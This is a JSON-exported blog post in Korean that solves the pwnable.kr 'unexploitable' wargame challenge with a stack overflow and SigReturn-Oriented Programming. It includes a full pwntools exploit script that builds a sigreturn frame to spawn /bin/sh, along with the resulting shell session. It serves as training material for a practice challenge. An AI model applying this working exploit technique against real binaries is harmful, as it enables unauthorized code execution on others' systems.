{"id":1704,"date":"2024-03-03T21:31:21","date_gmt":"2024-03-03T12:31:21","guid":{"rendered":"https:\/\/h4ck.kr\/?p=1704"},"modified":"2025-06-27T13:18:46","modified_gmt":"2025-06-27T04:18:46","slug":"unexploitable","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=1704","title":{"rendered":"unexploitable"},"content":{"rendered":"\n

Description<\/h2>\n\n\n\n

I don’t think this is exploitable bug. do you agree?<\/p>\n\n\n\n

(task is patched. unintended easy solutions will not work from now :P)<\/p>\n\n\n\n

ssh unexploitable@pwnable.kr -p2222 (pw:guest)<\/p>\n\n\n\n

\n\n\n\n

checksec<\/h2>\n\n\n\n
\n
\n
seo@seo:~\/Documents\/pwnable.kr\/unexploitable$ checksec .\/unexploitable\n[*] '\/home\/seo\/Documents\/pwnable.kr\/unexploitable\/unexploitable'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n\n\n\n
Decompiled-src <\/h2>\n\n\n\n
main<\/h3>\n\n\n\n
\n
\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char buf[16]; \/\/ [rsp+0h] [rbp-10h] BYREF\n\n  sleep(3u);\n  return read(0, buf, 0x50FuLL);\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
16\ubc14\uc774\ud2b8 \ud06c\uae30\uc758 buf\uc5d0 read \ud568\uc218\ub97c \ud1b5\ud574 0x50f\ub9cc\ud07c \ub118\uce58\uac8c \uc785\ub825\ubc1b\uc73c\ubbc0\ub85c,
\ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n
\n\n\n\n
Solution<\/h2>\n\n\n\n
\uc258\uc744 \ud68d\ub4dd\ud560 \uc218 \uc788\ub294 \uc4f8\ub9cc\ud55c rop \uac00\uc82f\ub4e4\uc774 \uc801\uae30 \ub54c\ubb38\uc5d0 
SigReturn-Oriented Programming \uae30\ubc95\uc744 \uc0ac\uc6a9\ud55c\ub2e4.<\/p>\n\n\n\n
rax \ub808\uc9c0\uc2a4\ud130\uac12\uc744 SYS_rt_sigreturn \uc2dc\uc2a4\ud15c\ucf5c \ubc88\ud638\uc778 15\ub85c \ucee8\ud2b8\ub864\ud558\uae30 \uc704\ud574 \uc544\ub798 \uac00\uc82f\ub97c \uc751\uc6a9\ud55c\ub2e4.<\/p>\n\n\n\n
\n
\n
gdb-peda$ disas main\nDump of assembler code for function main:\n...\n   0x000000000040055b <+23>:    lea    rax,[rbp-0x10]\n   0x000000000040055f <+27>:    mov    edx,0x50f\n   0x0000000000400564 <+32>:    mov    rsi,rax\n   0x0000000000400567 <+35>:    mov    edi,0x0\n   0x000000000040056c <+40>:    mov    eax,0x0\n   0x0000000000400571 <+45>:    call   0x400430 <read@plt>\n   0x0000000000400576 <+50>:    leave\n   0x0000000000400577 <+51>:    ret<\/pre>\n<\/div>\n<\/div>\n\n\n\n
1) read(0, (void *)(0x601068), 0x50FuLL);<\/strong>
16\ubc14\uc774\ud2b8\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6b0\uace0, 
rbp\ub97c 0x601078(=mem_region)\uc73c\ub85c \ud558\uc5ec 0x601068 \uc8fc\uc18c\uc5d0 \ub370\uc774\ud130\ub97c \uc4f0\ub3c4\ub85d \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n
\n
\n
# read(0, (void *)(mem_region-0x10), 0x50FuLL);\n# read(0, (void *)(0x601068), 0x50FuLL);\npayload = b'A'*16\npayload += p64(mem_region)\npayload += p64(main_lea_read)\np.sendline(payload)\nsleep(0.5)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
2) \uc774\uc81c 0x601068 \uc9c0\uc810\uc5d0 \ub370\uc774\ud130\ub97c \uc4f0\ub294\ub370, 
\uc5ec\uae30\uc5d0 “\/bin\/sh”, srop, \uadf8\ub9ac\uace0 \ud55c\ubc88\ub354 read \ud568\uc218\ub97c \ud638\ucd9c\ud558\uac8c \ub9cc\ub4dc\ub294 \ud398\uc774\ub85c\ub4dc\ub97c \uc791\uc131\ud55c\ub2e4.<\/p>\n\n\n\n
\n
\n
# set payload data to 0x601068\n# read(0, (void *)(mem_region+0x18), 0x50FuLL);\n# read(0, (void *)(0x601078), 0x50FuLL);\npayload = bin_sh                #0x601068\npayload += b'B'*8               #0x601070\npayload += p64(mem_region+0x18) #0x601078 <- read to 0x601078\npayload += p64(main_lea_read)   #0x601080 <- control RIP\npayload += bytes(frame)         #0x601088 <- srop payload\np.sendline(payload)\n\n# before leave; RBP: 0x601078 --> 0x601090 --> 0x0\n# after leave; RSP: 0x601080 --> 0x40055b (main_lea_read)\n# after ret; RIP: 0x40055b (<main+23>:       lea    rax,[rbp-0x10])\n\nsleep(0.5)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
3) 0x601078 \uc9c0\uc810\uc5d0 15\ubc14\uc774\ud2b8\ub9cc\ud07c \ub370\uc774\ud130\ub97c \uc4f0\ub294\ub370, 
srop \ud398\uc774\ub85c\ub4dc\ub294 \uc720\uc9c0\ud55c\ucc44\ub85c \uc774\uc81c RIP\uac00 syscall \uc8fc\uc18c\ub85c \ud5a5\ud558\uac8c\ub054 \ub9cc\ub4e4\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
\n
\n
# make rax to 15 using read\npayload = p64(syscall)          #0x601078\npayload += bytes(frame)[:6] # keep frame, make rax to 15 (SYS_rt_sigreturn)\np.sendline(payload)\n\n# before leave; RBP: 0x601070\n# after leave; RSP: 0x601078 --> 0x400560 (syscall)\n# after ret; RIP: 0x400560 (<main+28>:       syscall)\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
solve.py<\/h2>\n\n\n\n
\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/unexploitable\")\ns = ssh('unexploitable', 'pwnable.kr', 2222, 'guest')\np = s.process(executable=\".\/unexploitable\")\ne = ELF('.\/unexploitable')\n\nbin_sh = b\"\/bin\/sh\\x00\"\nmem_region = e.bss()+0x50 #0x601078\nprint(f\"mem_region: {hex(mem_region)}\")\nmain_lea_read = e.symbols['main'] + 0x17\nprint(f\"main_lea_read: {hex(main_lea_read)}\")\nsyscall = e.symbols['main'] + 0x1c\nprint(f\"syscall: {hex(syscall)}\")\n\n########  SROP ########\nbin_sh_address = 0x601068\nframe = SigreturnFrame(arch=\"amd64\")\nframe.rax = 0x3b\nframe.rdi = bin_sh_address\nframe.rip = syscall\n#######################\n\nsleep(3.5)\n\n# read(0, (void *)(mem_region-0x10), 0x50FuLL);\n# read(0, (void *)(0x601068), 0x50FuLL);\npayload = b'A'*16\npayload += p64(mem_region)\npayload += p64(main_lea_read)\np.sendline(payload)\nsleep(0.5)\n\n# set payload data to 0x601068\n# read(0, (void *)(mem_region+0x18), 0x50FuLL);\n# read(0, (void *)(0x601078), 0x50FuLL);\npayload = bin_sh                #0x601068\npayload += b'B'*8               #0x601070\npayload += p64(mem_region+0x18) #0x601078 <- read to 0x601078\npayload += p64(main_lea_read)   #0x601080 <- control RIP\npayload += bytes(frame)         #0x601088 <- srop payload\np.sendline(payload)\n# before leave; RBP: 0x601078 --> 0x601090 --> 0x0\n# after leave; RSP: 0x601080 --> 0x40055b (main_lea_read)\n# after ret; RIP: 0x40055b (<main+23>:       lea    rax,[rbp-0x10])\nsleep(0.5)\n\n\n# make rax to 15 using read\npayload = p64(syscall)          #0x601078\npayload += bytes(frame)[:6] # keep frame, make rax to 15 (SYS_rt_sigreturn)\np.sendline(payload)\n# before leave; RBP: 0x601070\n# after leave; RSP: 0x601078 --> 0x400560 (syscall)\n# after ret; RIP: 0x400560 (<main+28>:       syscall)\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Result<\/h2>\n\n\n\n
\n
\n
seo@seo:~\/Documents\/pwnable.kr\/unexploitable$ python3 solve2.py\n[+] Starting local process '.\/unexploitable': pid 29716\n[+] Connecting to pwnable.kr on port 2222: Done\n[*] unexploitable@pwnable.kr:\n    Distro    Ubuntu 16.04\n    OS:       linux\n    Arch:     amd64\n    Version:  4.4.179\n    ASLR:     Enabled\n[+] Starting remote process bytearray(b'.\/unexploitable') on pwnable.kr: pid 210214\n[*] '\/home\/seo\/Documents\/pwnable.kr\/unexploitable\/unexploitable'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\nmem_region: 0x601078\nmain_lea_read: 0x40055b\nsyscall: 0x400560\n[*] Switching to interactive mode\n$ $ ls\nflag  unexploitable  unexploitable.c\n$ $ cat flag\nsigreturn rop..? not a secret technique anymore!!\n$ $\n[*] Interrupted\n[*] Stopped process '.\/unexploitable' (pid 29716)<\/pre>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
Description I don’t think this is exploitable bug. do you agree? (task is patched. unintended easy solutions will not work from now :P) ssh unexploitable@pwnable.kr -p2222 (pw:guest) checksec Decompiled-src main 16\ubc14\uc774\ud2b8 \ud06c\uae30\uc758 buf\uc5d0 read \ud568\uc218\ub97c \ud1b5\ud574 0x50f\ub9cc\ud07c \ub118\uce58\uac8c \uc785\ub825\ubc1b\uc73c\ubbc0\ub85c,\ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\uac00 \ubc1c\uc0dd\ud55c\ub2e4. Solution \uc258\uc744 \ud68d\ub4dd\ud560 \uc218 \uc788\ub294 \uc4f8\ub9cc\ud55c rop \uac00\uc82f\ub4e4\uc774 \uc801\uae30 \ub54c\ubb38\uc5d0 SigReturn-Oriented Programming \uae30\ubc95\uc744 \uc0ac\uc6a9\ud55c\ub2e4.… \ub354 \ubcf4\uae30 »unexploitable<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25,71],"class_list":["post-1704","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable","tag-srop"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1704","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1704"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1704\/revisions"}],"predecessor-version":[{"id":1705,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1704\/revisions\/1705"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}